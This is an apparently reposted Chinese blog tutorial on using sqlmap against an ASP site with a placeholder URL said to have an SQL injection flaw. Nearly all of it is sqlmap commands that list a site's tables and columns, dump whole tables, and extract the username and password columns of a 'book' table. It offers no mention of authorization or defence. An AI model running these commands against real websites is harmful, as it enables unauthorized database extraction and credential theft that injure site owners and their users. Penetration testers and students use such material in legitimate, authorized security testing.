码迷,mamicode.com
首页 > 数据库 > 详细

sqlmap测试asp实战

时间:2017-05-10 16:27:40      阅读:324      评论:0      收藏:0      [点我收藏+]

标签:map   sqlmap   xxxx   线程   技术分享   www   针对   log   注入   

如果检测到某个网址,比如www.XXXXXX.asp?id=26存在sql注入漏洞

爆表名

sqlmap -u "www.XXXXXX.asp?id=26" --tables

线程选10不到1分钟获取到所有表名

技术分享

爆字段

这里针对book表

sqlmap -u "www.XXXXXX.asp?id=26" --columns -T "book"

线程数选10

同样不到一分钟,book表所有的字段全都爆出来了

技术分享

获取所有表的内容

sqlmap -u "www.XXXXXX.asp?id=26" --dump

只获取某个表的内容

 

sqlmap -u "www.XXXXXX.asp?id=26" --dump -T "book"

只获取某个表中某些列的内容

sqlmap -u "www.XXXXXXX.asp?id=26" --dump -C "username,password" -T "book"

 

sqlmap测试asp实战

标签:map   sqlmap   xxxx   线程   技术分享   www   针对   log   注入   

原文地址:http://www.cnblogs.com/zylq-blog/p/6836374.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!